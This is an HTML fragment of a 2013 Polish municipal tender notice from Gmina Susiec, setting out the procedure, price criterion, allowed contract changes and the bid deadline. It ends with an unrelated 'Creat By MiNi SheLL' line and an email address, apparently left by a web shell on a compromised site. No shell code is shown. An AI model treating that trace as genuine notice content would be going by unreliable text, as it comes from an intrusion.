<p>Nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1.Konieczność wprowadzenia zmian wynikła z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
2.Wprowadzenie zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności usprawnienia procesu realizacji zamówienia.
3.W zakresie sposobu realizacji zamówienia w przypadku zmiany przepisów prawa w tym zakresie.
4.Zmiany oczywistych pomyłek pisarskich, rachunkowych , siedziby firmy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.susiec.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Susiec, ul. Tomaszowska  2, 22-672 Susiec, pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2013 godzina 10:00, miejsce: Urząd Gminy Susiec, ul. Tomaszowska 2 , 22-672 Susiec, pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com